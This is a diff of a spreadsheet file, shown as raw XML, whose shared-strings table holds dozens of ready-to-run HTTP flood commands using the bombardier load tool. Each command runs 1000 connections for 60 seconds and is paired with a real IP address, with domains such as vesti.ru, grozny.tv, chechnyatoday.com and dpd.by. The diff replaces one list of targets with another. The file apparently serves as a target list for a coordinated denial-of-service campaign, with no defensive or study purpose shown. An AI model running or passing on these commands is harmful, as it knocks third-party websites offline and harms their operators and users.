+    <row r="530" ht="15.35" customHeight="1">
+      <c r="A530" s="3"/>
+      <c r="B530" s="3"/>
+      <c r="C530" s="3"/>
+      <c r="D530" s="3"/>
+      <c r="E530" s="3"/>
+    </row>
+    <row r="531" ht="15.35" customHeight="1">
+      <c r="A531" s="3"/>
+      <c r="B531" s="3"/>
+      <c r="C531" s="3"/>
+      <c r="D531" s="3"/>
+      <c r="E531" s="3"/>
+    </row>
+    <row r="532" ht="15.35" customHeight="1">
+      <c r="A532" s="3"/>
+      <c r="B532" s="3"/>
+      <c r="C532" s="3"/>
+      <c r="D532" s="3"/>
+      <c r="E532" s="3"/>
+    </row>
+    <row r="533" ht="15.35" customHeight="1">
+      <c r="A533" s="3"/>
+      <c r="B533" s="3"/>
+      <c r="C533" s="3"/>
+      <c r="D533" s="3"/>
+      <c r="E533" s="3"/>
+    </row>
+    <row r="534" ht="15.35" customHeight="1">
+      <c r="A534" s="3"/>
+      <c r="B534" s="3"/>
+      <c r="C534" s="3"/>
+      <c r="D534" s="3"/>
+      <c r="E534" s="3"/>
+    </row>
+    <row r="535" ht="15.35" customHeight="1">
+      <c r="A535" s="3"/>
+      <c r="B535" s="3"/>
+      <c r="C535" s="3"/>
+      <c r="D535" s="3"/>
+      <c r="E535" s="3"/>
+    </row>
+    <row r="536" ht="15.35" customHeight="1">
+      <c r="A536" s="3"/>
+      <c r="B536" s="3"/>
+      <c r="C536" s="3"/>
+      <c r="D536" s="3"/>
+      <c r="E536" s="3"/>
+    </row>
+    <row r="537" ht="15.35" customHeight="1">
+      <c r="A537" s="3"/>
+      <c r="B537" s="3"/>
+      <c r="C537" s="3"/>
+      <c r="D537" s="3"/>
+      <c r="E537" s="3"/>
+    </row>
+    <row r="538" ht="15.35" customHeight="1">
+      <c r="A538" s="3"/>
+      <c r="B538" s="3"/>
+      <c r="C538" s="3"/>
+      <c r="D538" s="3"/>
+      <c r="E538" s="3"/>
+    </row>
+    <row r="539" ht="15.35" customHeight="1">
+      <c r="A539" s="3"/>
+      <c r="B539" s="3"/>
+      <c r="C539" s="3"/>
+      <c r="D539" s="3"/>
+      <c r="E539" s="3"/>
+    </row>
+    <row r="540" ht="15.35" customHeight="1">
+      <c r="A540" s="3"/>
+      <c r="B540" s="3"/>
+      <c r="C540" s="3"/>
+      <c r="D540" s="3"/>
+      <c r="E540" s="3"/>
+    </row>
+    <row r="541" ht="15.35" customHeight="1">
+      <c r="A541" s="3"/>
+      <c r="B541" s="3"/>
+      <c r="C541" s="3"/>
+      <c r="D541" s="3"/>
+      <c r="E541" s="3"/>
+    </row>
+    <row r="542" ht="15.35" customHeight="1">
+      <c r="A542" s="3"/>
+      <c r="B542" s="3"/>
+      <c r="C542" s="3"/>
+      <c r="D542" s="3"/>
+      <c r="E542" s="3"/>
+    </row>
+    <row r="543" ht="15.35" customHeight="1">
+      <c r="A543" s="3"/>
+      <c r="B543" s="3"/>
+      <c r="C543" s="3"/>
+      <c r="D543" s="3"/>
+      <c r="E543" s="3"/>
+    </row>
+    <row r="544" ht="15.35" customHeight="1">
+      <c r="A544" s="3"/>
+      <c r="B544" s="3"/>
+      <c r="C544" s="3"/>
+      <c r="D544" s="3"/>
+      <c r="E544" s="3"/>
+    </row>
+    <row r="545" ht="15.35" customHeight="1">
+      <c r="A545" s="3"/>
+      <c r="B545" s="3"/>
+      <c r="C545" s="3"/>
+      <c r="D545" s="3"/>
+      <c r="E545" s="3"/>
+    </row>
+    <row r="546" ht="15.35" customHeight="1">
+      <c r="A546" s="3"/>
+      <c r="B546" s="3"/>
+      <c r="C546" s="3"/>
+      <c r="D546" s="3"/>
+      <c r="E546" s="3"/>
+    </row>
+    <row r="547" ht="15.35" customHeight="1">
+      <c r="A547" s="3"/>
+      <c r="B547" s="3"/>
+      <c r="C547" s="3"/>
+      <c r="D547" s="3"/>
+      <c r="E547" s="3"/>
+    </row>
+    <row r="548" ht="15.35" customHeight="1">
+      <c r="A548" s="3"/>
+      <c r="B548" s="3"/>
+      <c r="C548" s="3"/>
+      <c r="D548" s="3"/>
+      <c r="E548" s="3"/>
+    </row>
+    <row r="549" ht="15.35" customHeight="1">
+      <c r="A549" s="3"/>
+      <c r="B549" s="3"/>
+      <c r="C549" s="3"/>
+      <c r="D549" s="3"/>
+      <c r="E549" s="3"/>
+    </row>
+    <row r="550" ht="15.35" customHeight="1">
+      <c r="A550" s="3"/>
+      <c r="B550" s="3"/>
+      <c r="C550" s="3"/>
+      <c r="D550" s="3"/>
+      <c r="E550" s="3"/>
+    </row>
+    <row r="551" ht="15.35" customHeight="1">
+      <c r="A551" s="3"/>
+      <c r="B551" s="3"/>
+      <c r="C551" s="3"/>
+      <c r="D551" s="3"/>
+      <c r="E551" s="3"/>
+    </row>
+    <row r="552" ht="15.35" customHeight="1">
+      <c r="A552" s="3"/>
+      <c r="B552" s="3"/>
+      <c r="C552" s="3"/>
+      <c r="D552" s="3"/>
+      <c r="E552" s="3"/>
+    </row>
+    <row r="553" ht="15.35" customHeight="1">
+      <c r="A553" s="3"/>
+      <c r="B553" s="3"/>
+      <c r="C553" s="3"/>
+      <c r="D553" s="3"/>
+      <c r="E553" s="3"/>
+    </row>
+    <row r="554" ht="15.35" customHeight="1">
+      <c r="A554" s="3"/>
+      <c r="B554" s="3"/>
+      <c r="C554" s="3"/>
+      <c r="D554" s="3"/>
+      <c r="E554" s="3"/>
+    </row>
+    <row r="555" ht="15.35" customHeight="1">
+      <c r="A555" s="3"/>
+      <c r="B555" s="3"/>
+      <c r="C555" s="3"/>
+      <c r="D555" s="3"/>
+      <c r="E555" s="3"/>
+    </row>
+    <row r="556" ht="15.35" customHeight="1">
+      <c r="A556" s="3"/>
+      <c r="B556" s="3"/>
+      <c r="C556" s="3"/>
+      <c r="D556" s="3"/>
+      <c r="E556" s="3"/>
+    </row>
+    <row r="557" ht="15.35" customHeight="1">
+      <c r="A557" s="3"/>
+      <c r="B557" s="3"/>
+      <c r="C557" s="3"/>
+      <c r="D557" s="3"/>
+      <c r="E557" s="3"/>
+    </row>
+    <row r="558" ht="15.35" customHeight="1">
+      <c r="A558" s="3"/>
+      <c r="B558" s="3"/>
+      <c r="C558" s="3"/>
+      <c r="D558" s="3"/>
+      <c r="E558" s="3"/>
+    </row>
+    <row r="559" ht="15.35" customHeight="1">
+      <c r="A559" s="3"/>
+      <c r="B559" s="3"/>
+      <c r="C559" s="3"/>
+      <c r="D559" s="3"/>
+      <c r="E559" s="3"/>
+    </row>
+    <row r="560" ht="15.35" customHeight="1">
+      <c r="A560" s="3"/>
+      <c r="B560" s="3"/>
+      <c r="C560" s="3"/>
+      <c r="D560" s="3"/>
+      <c r="E560" s="3"/>
+    </row>
+    <row r="561" ht="15.35" customHeight="1">
+      <c r="A561" s="3"/>
+      <c r="B561" s="3"/>
+      <c r="C561" s="3"/>
+      <c r="D561" s="3"/>
+      <c r="E561" s="3"/>
+    </row>
+    <row r="562" ht="15.35" customHeight="1">
+      <c r="A562" s="3"/>
+      <c r="B562" s="3"/>
+      <c r="C562" s="3"/>
+      <c r="D562" s="3"/>
+      <c r="E562" s="3"/>
+    </row>
+    <row r="563" ht="15.35" customHeight="1">
+      <c r="A563" s="3"/>
+      <c r="B563" s="3"/>
+      <c r="C563" s="3"/>
+      <c r="D563" s="3"/>
+      <c r="E563" s="3"/>
+    </row>
+    <row r="564" ht="15.35" customHeight="1">
+      <c r="A564" s="3"/>
+      <c r="B564" s="3"/>
+      <c r="C564" s="3"/>
+      <c r="D564" s="3"/>
+      <c r="E564" s="3"/>
+    </row>
+    <row r="565" ht="15.35" customHeight="1">
+      <c r="A565" s="3"/>
+      <c r="B565" s="3"/>
+      <c r="C565" s="3"/>
+      <c r="D565" s="3"/>
+      <c r="E565" s="3"/>
+    </row>
+    <row r="566" ht="15.35" customHeight="1">
+      <c r="A566" s="3"/>
+      <c r="B566" s="3"/>
+      <c r="C566" s="3"/>
+      <c r="D566" s="3"/>
+      <c r="E566" s="3"/>
+    </row>
   </sheetData>
-  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
   <pageSetup firstPageNumber="1" fitToHeight="1" fitToWidth="1" scale="100" useFirstPageNumber="0" orientation="portrait" pageOrder="downThenOver"/>
   <headerFooter>
     <oddFooter>&amp;C&amp;"Helvetica Neue,Regular"&amp;12&amp;K000000&amp;P</oddFooter>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,252 +11,321 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="396">
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 162.255.119.192&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>162.255.119.192</t>
-  </si>
-  <si>
-    <t>rtr-planeta.com</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 192.64.119.130&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>192.64.119.130</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.190.63.111&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>64.190.63.111</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 72.52.179.175&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>72.52.179.175</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.134&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.247.32.134</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.206&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.247.32.206</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.209&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.247.32.209</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.46.30&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.247.46.30</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.46.68&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.247.46.68</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.46.69&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.247.46.69</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 109.234.156.107&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>109.234.156.107</t>
-  </si>
-  <si>
-    <t>vesti.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 151.248.120.203&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>151.248.120.203</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.31.179.191&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>176.31.179.191</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.99.12.170&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>176.99.12.170</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.208.83.45&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.208.83.45</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.232.222&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.232.222</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.10.45.39&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.10.45.39</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.22.235.94&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.22.235.94</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.113.234.215&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>194.113.234.215</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.209.148.130&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.209.148.130</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.42.165.36&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.42.165.36</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.196.234&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>217.69.196.234</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.205.163&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>31.31.205.163</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.21.252.14&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>46.21.252.14</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.188.28.172&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>5.188.28.172</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.188.30.5&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>5.188.30.5</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.50.65.32&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>52.50.65.32</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.122.170.171&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>62.122.170.171</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.46.39.162&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>78.46.39.162</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.208&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.247.32.208</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.247.32.247&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.247.32.247</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.13.58.18&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>81.13.58.18</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.176.77.99&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>81.176.77.99</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.90.180.107&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>81.90.180.107</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.146.36.160&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>82.146.36.160</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.206&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>87.236.16.206</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.211.250.222&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.211.250.222</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.236.136.178&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.236.136.178</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.241.170.215&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>92.241.170.215</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.31.224.95&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>95.31.224.95</t>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="188">
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.88.21.249&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>77.88.21.249</t>
+  </si>
+  <si>
+    <t>grozny.tv</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.129.100.200&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.129.100.200</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.170.100&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>186.2.170.100</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.178.208.45&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.178.208.45</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.60.110&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.60.110</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.188.109.70&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>89.188.109.70</t>
+  </si>
+  <si>
+    <t>grozny-inform.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.100.180.180&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>94.100.180.180</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.241.116.117&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.241.116.117</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.159.233.17&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>85.159.233.17</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.165.223.182&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>46.165.223.182</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.59.1.205&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>108.59.1.205</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.163.112&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>186.2.163.112</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.189.182.182&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>90.189.182.182</t>
+  </si>
+  <si>
+    <t>ngrz.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.58.117.18&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.58.117.18</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 144.76.167.14&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>144.76.167.14</t>
+  </si>
+  <si>
+    <t>chechnyatoday.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.178.208.177&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.178.208.177</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.249.83.165&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>80.249.83.165</t>
+  </si>
+  <si>
+    <t>dpd.by</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.20.1&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.217.20.1</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.21.1&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.217.21.1</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.66.69.19&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.66.69.19</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.40.2.9&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.40.2.9</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.201.84&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.172.201.84</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.127&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.127</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.67&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.67</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.57&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.57</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.84&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.84</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.73&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.73</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.44&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.44</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.72&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.72</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.71&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.99.71</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 198.54.126.25&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>198.54.126.25</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.209.148.74&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>85.209.148.74</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.84.119.237&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.84.119.237</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 167.71.55.106&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>167.71.55.106</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.128.23.153&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>52.128.23.153</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.72&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.72</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.73&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.73</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 34.102.136.180&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>34.102.136.180</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.7&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.7</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 205.178.189.131&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>205.178.189.131</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.23.56&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.125.23.56</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.3&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>149.232.252.3</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.193.27&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.124.193.27</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.19&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>149.232.252.19</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.155.60.4&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>45.155.60.4</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.230&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.230</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.155.60.8&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>45.155.60.8</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.138.245.10&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>62.138.245.10</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.3.234&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>104.21.3.234</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.50.4.186&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.50.4.186</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.106.250&amp;&amp; sleep 5;</t>
@@ -505,700 +574,7 @@
     <t>104.21.29.14</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.249.83.165&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.249.83.165</t>
-  </si>
-  <si>
-    <t>dpd.by</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.20.1&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.217.20.1</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.21.1&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.217.21.1</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.66.69.19&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.66.69.19</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.40.2.9&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>188.40.2.9</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.201.84&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.172.201.84</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.127&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.127</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.67&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.67</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.57&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.57</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.84&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.84</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.73&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.73</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.44&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.44</t>
-  </si>
-  <si>
